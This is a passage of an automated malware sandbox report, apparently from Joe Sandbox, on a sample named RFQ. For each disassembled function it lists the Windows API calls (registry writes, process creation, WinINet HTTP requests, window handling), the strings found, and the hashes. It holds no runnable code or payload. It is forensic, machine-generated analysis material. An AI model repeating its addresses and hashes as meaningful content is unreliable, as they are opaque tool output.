                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$BuffCharUpper
                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                            • API String ID: 1256254125-909552448
                                                                            • Opcode ID: 6298f9a9cbbff0a142f3f56a72f0abaf42d6811b27f18417ebfccf28149bce27
                                                                            • Instruction ID: 29346b875926ac67ee25258662764bc141377564f5d3194b5812490edc118540
                                                                            • Opcode Fuzzy Hash: 6298f9a9cbbff0a142f3f56a72f0abaf42d6811b27f18417ebfccf28149bce27
                                                                            • Instruction Fuzzy Hash: C4711272A1416ACBCB22EF7CCD415BA33D2AF61764B554329E8619B2D4EB7CDD40C3A0
                                                                            Function 006890F8 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                            • API String ID: 0-1645009161
                                                                            • Opcode ID: 74a2363b2ec4e814bf64e71d956ee4397630bfcdc64baa00f692e8cf88d57217
                                                                            • Instruction ID: 87d307733d74f82708d391473e4c9665c289656f475fbdea74518af35e250775
                                                                            • Opcode Fuzzy Hash: 74a2363b2ec4e814bf64e71d956ee4397630bfcdc64baa00f692e8cf88d57217
                                                                            • Instruction Fuzzy Hash: 6C81D5B1600605BACB61BF64DC56FFA376AEF05340F084128F9069B691EB74EA81CB65
                                                                            Function 006E5971 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadIconW.USER32(00000063), ref: 006E5984
                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 006E5996
                                                                            • SetWindowTextW.USER32(?,?), ref: 006E59AD
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 006E59C2
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 006E59C8
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 006E59D8
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 006E59DE
                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 006E59FF
                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 006E5A19
                                                                            • GetWindowRect.USER32(?,?), ref: 006E5A22
                                                                            • _wcslen.LIBCMT ref: 006E5A89
                                                                            • SetWindowTextW.USER32(?,?), ref: 006E5AC5
                                                                            • GetDesktopWindow.USER32 ref: 006E5ACB
                                                                            • GetWindowRect.USER32(00000000), ref: 006E5AD2
                                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 006E5B29
                                                                            • GetClientRect.USER32(?,?), ref: 006E5B36
                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 006E5B5B
                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 006E5B85
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                            • String ID:
                                                                            • API String ID: 895679908-0
                                                                            • Opcode ID: bb70bef758ee5e16e21f189aef49dde48b2de875a27de22ab0b0bb470e7e169e
                                                                            • Instruction ID: 6f8aabe6754974c4f4530dc37bc231419ce37399ffa1128a95b30abc03fefb87
                                                                            • Opcode Fuzzy Hash: bb70bef758ee5e16e21f189aef49dde48b2de875a27de22ab0b0bb470e7e169e
                                                                            • Instruction Fuzzy Hash: AA717F31901B49DFDB21DFA9CD85AAEBBF6FF48708F104528E143A26A0D774E944CB54
                                                                            Function 006FFD35 Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 006FFD4E
                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 006FFD59
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 006FFD64
                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 006FFD6F
                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 006FFD7A
                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 006FFD85
                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 006FFD90
                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 006FFD9B
                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 006FFDA6
                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 006FFDB1
                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 006FFDBC
                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 006FFDC7
                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 006FFDD2
                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 006FFDDD
                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 006FFDE8
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 006FFDF3
                                                                            • GetCursorInfo.USER32(?), ref: 006FFE03
                                                                            • GetLastError.KERNEL32 ref: 006FFE45
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                                            • String ID:
                                                                            • API String ID: 3215588206-0
                                                                            • Opcode ID: 0468fd8079fc4ef0c4803549060437e5f3995c67c541cbb678eec67d4778acc0
                                                                            • Instruction ID: 56becffd497317430aec15989b22bff644a0157721745cd6d669d3a40a75d004
                                                                            • Opcode Fuzzy Hash: 0468fd8079fc4ef0c4803549060437e5f3995c67c541cbb678eec67d4778acc0
                                                                            • Instruction Fuzzy Hash: 934187B0D483196ADB10DFBA8C8586EBFE9FF04750B50452AE11CE7291D778D901CF95
                                                                            Function 0070C2DE Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 473registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0070C3E4
                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0071D0D0,00000000,?,00000000,?,?), ref: 0070C46B
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0070C4CB
                                                                            • _wcslen.LIBCMT ref: 0070C51B
                                                                            • _wcslen.LIBCMT ref: 0070C596
                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0070C5D9
                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0070C6E8
                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0070C887
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Value$_wcslen$CloseConnectCreateRegistry
                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                            • API String ID: 3165515054-966354055
                                                                            • Opcode ID: 93763bcabe3f556e1f74f770942c24818fbf20aef8ae730899df017dfab9ddbc
                                                                            • Instruction ID: 0f6ac657ee2235731fddd3b675d587035362f8cfb57d80a44feca0c6b9d6b380
                                                                            • Opcode Fuzzy Hash: 93763bcabe3f556e1f74f770942c24818fbf20aef8ae730899df017dfab9ddbc
                                                                            • Instruction Fuzzy Hash: 97128975204200DFDB15EF14C885A2AB7E6FF88714F148A9CF94A9B3A2CB35ED41CB85
                                                                            Function 006A0046 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 006A0046
                                                                              • Part of subcall function 006A006D: InitializeCriticalSectionAndSpinCount.KERNEL32(0075070C,00000FA0,6F5E5D4F,?,?,?,?,006C2353,000000FF), ref: 006A009C
                                                                              • Part of subcall function 006A006D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,006C2353,000000FF), ref: 006A00A7
                                                                              • Part of subcall function 006A006D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,006C2353,000000FF), ref: 006A00B8
                                                                              • Part of subcall function 006A006D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 006A00CE
                                                                              • Part of subcall function 006A006D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 006A00DC
                                                                              • Part of subcall function 006A006D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 006A00EA
                                                                              • Part of subcall function 006A006D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 006A0115
                                                                              • Part of subcall function 006A006D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 006A0120
                                                                            • ___scrt_fastfail.LIBCMT ref: 006A0067
                                                                              • Part of subcall function 006A0023: __onexit.LIBCMT ref: 006A0029
                                                                            Strings
                                                                            • InitializeConditionVariable, xrefs: 006A00C8
                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 006A00A2
                                                                            • kernel32.dll, xrefs: 006A00B3
                                                                            • WakeAllConditionVariable, xrefs: 006A00E2
                                                                            • SleepConditionVariableCS, xrefs: 006A00D4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                            • API String ID: 66158676-1714406822
                                                                            • Opcode ID: 13097d86b1f1df4288e8b0fb3e5a1e08e839ac7a58259aa8586ffb20b86f3b09
                                                                            • Instruction ID: 0f1658cdcffe2a53fda73b7584f1a19e50bbe3ef751ddd74d85d1bd6829affea
                                                                            • Opcode Fuzzy Hash: 13097d86b1f1df4288e8b0fb3e5a1e08e839ac7a58259aa8586ffb20b86f3b09
                                                                            • Instruction Fuzzy Hash: 37212C72A807057BEB116BE8AC15BE9339ADB0AF51F008139F901D63D0DFB89C404E98
                                                                            Function 006E303A Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen
                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                            • API String ID: 176396367-1603158881
                                                                            • Opcode ID: 8a10f2ec1a2b7d202e53d6d17f6f14abdc38b7c934fa74d871cae0a56994f17c
                                                                            • Instruction ID: 723846056a7030f754057f6ee3823548d2e18721f88551896d6b4dd390cd0405
                                                                            • Opcode Fuzzy Hash: 8a10f2ec1a2b7d202e53d6d17f6f14abdc38b7c934fa74d871cae0a56994f17c
                                                                            • Instruction Fuzzy Hash: 83E1C532A017A6DBCB18EFB9C8496EDB7B2BF15710F54422DE456A7380DB309F458B90
                                                                            Function 006F43DE Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$BuffCharDriveLowerType
                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                            • API String ID: 2055661098-1000479233
                                                                            • Opcode ID: a9a2721efe0206fa63a0567e799d70a4ffbda7dbba47b4947aa90e9886043248
                                                                            • Instruction ID: c04748b7de11c46dada074dc82775c7d143c0177a526dd3106a63229a3ab020d
                                                                            • Opcode Fuzzy Hash: a9a2721efe0206fa63a0567e799d70a4ffbda7dbba47b4947aa90e9886043248
                                                                            • Instruction Fuzzy Hash: DCB1DE316083069BC710EF28C890ABBB7E6FFA5720F504A1DF696C7691EB34D945CB52
                                                                            Function 00719010 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0069B021: GetWindowLongW.USER32(?,000000EB), ref: 0069B032
                                                                            • DragQueryPoint.SHELL32(?,?), ref: 00719039
                                                                              • Part of subcall function 00717543: ClientToScreen.USER32(?,?), ref: 00717569
                                                                              • Part of subcall function 00717543: GetWindowRect.USER32(?,?), ref: 007175DF
                                                                              • Part of subcall function 00717543: PtInRect.USER32(?,?,00718A7B), ref: 007175EF
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 007190A2
                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007190AD
                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007190D0
                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00719117
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00719130
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00719147
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00719169
                                                                            • DragFinish.SHELL32(?), ref: 00719170
                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00719263
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#u
                                                                            • API String ID: 221274066-1344711150
                                                                            • Opcode ID: 500ae34affa874aad0709ebbe8d4352f68626733801e7f5609cdb78cc42a08a8
                                                                            • Instruction ID: 1107330f376c85c0edc691f1d39da640b02107e516d1f98923ea87f78802180f
                                                                            • Opcode Fuzzy Hash: 500ae34affa874aad0709ebbe8d4352f68626733801e7f5609cdb78cc42a08a8
                                                                            • Instruction Fuzzy Hash: 8E61AA71108301AFC701EFA4CC99DAFBBE9EF89350F004A1DF591921E1DB74AA49CB56
                                                                            Function 0070AF20 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 0070B0BF
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0070B0D7
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0070B0FB
                                                                            • _wcslen.LIBCMT ref: 0070B127
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0070B13B
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0070B15D
                                                                            • _wcslen.LIBCMT ref: 0070B259
                                                                              • Part of subcall function 006F04C5: GetStdHandle.KERNEL32(000000F6), ref: 006F04E4
                                                                            • _wcslen.LIBCMT ref: 0070B272
                                                                            • _wcslen.LIBCMT ref: 0070B28D
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0070B2DD
                                                                            • GetLastError.KERNEL32(00000000), ref: 0070B32E
                                                                            • CloseHandle.KERNEL32(?), ref: 0070B360
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0070B371
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0070B383
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0070B395
                                                                            • CloseHandle.KERNEL32(?), ref: 0070B40A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 2178637699-0
                                                                            • Opcode ID: b673f295488f380fbc1451a36a057f70b13af2239df1a3647481b3d3b5a46211
                                                                            • Instruction ID: 584f9249633f42d455aa0f098b4729345268249b6e4cd797f465f01ec6ed61e3
                                                                            • Opcode Fuzzy Hash: b673f295488f380fbc1451a36a057f70b13af2239df1a3647481b3d3b5a46211
                                                                            • Instruction Fuzzy Hash: 84F1A931604340DFCB54EF24C891B6ABBE2AF85314F148A5DF9998B2E2CB34ED44CB56
                                                                            Function 00684C9A Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetMenuItemCount.USER32(00751990), ref: 006C3B6F
                                                                            • GetMenuItemCount.USER32(00751990), ref: 006C3C1F
                                                                            • GetCursorPos.USER32(?), ref: 006C3C63
                                                                            • SetForegroundWindow.USER32(00000000), ref: 006C3C6C
                                                                            • TrackPopupMenuEx.USER32(00751990,00000000,?,00000000,00000000,00000000), ref: 006C3C7F
                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 006C3C8B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                            • String ID: 0
                                                                            • API String ID: 36266755-4108050209
                                                                            • Opcode ID: fc75acdaa53655aae49270037403654ae233cef243834567dcf2a42c0e2491d0
                                                                            • Instruction ID: 99e85ab794f7c6db25ce69f5df63992b54e5c1e2d957ad98748411a50a9976d1
                                                                            • Opcode Fuzzy Hash: fc75acdaa53655aae49270037403654ae233cef243834567dcf2a42c0e2491d0
                                                                            • Instruction Fuzzy Hash: C3710730641225BEEB219F69DC49FEABF6AFF04364F10820AF514663D1C7B1AD10DB94
                                                                            Function 00716BA7 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?), ref: 00716CB9
                                                                              • Part of subcall function 006884E7: _wcslen.LIBCMT ref: 006884FA
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00716D2D
                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00716D4F
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00716D62
                                                                            • DestroyWindow.USER32(?), ref: 00716D83
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00680000,00000000), ref: 00716DB2
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00716DCB
                                                                            • GetDesktopWindow.USER32 ref: 00716DE4
                                                                            • GetWindowRect.USER32(00000000), ref: 00716DEB
                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00716E03
                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00716E1B
                                                                              • Part of subcall function 0069ADC4: GetWindowLongW.USER32(?,000000EB), ref: 0069ADD2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                            • String ID: 0$tooltips_class32
                                                                            • API String ID: 2429346358-3619404913
                                                                            • Opcode ID: 65af9a214548e8a42fae169ac2f8db8ac37795332f762608634c6e399c4e4d77
                                                                            • Instruction ID: 7114d858d01a1d66d4b45b182a7b988efd56e6a494fc7da2265d8e301a0be755
                                                                            • Opcode Fuzzy Hash: 65af9a214548e8a42fae169ac2f8db8ac37795332f762608634c6e399c4e4d77
                                                                            • Instruction Fuzzy Hash: 41717774644344AFDB21CF5CC844BAABBFAFB88304F44851EF985872A0C778E946CB16
                                                                            Function 006FC394 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006FC3CE
                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 006FC3E1
                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 006FC3F5
                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 006FC40E
                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 006FC451
                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 006FC467
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006FC472
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006FC4A2
                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 006FC4FA
                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 006FC50E
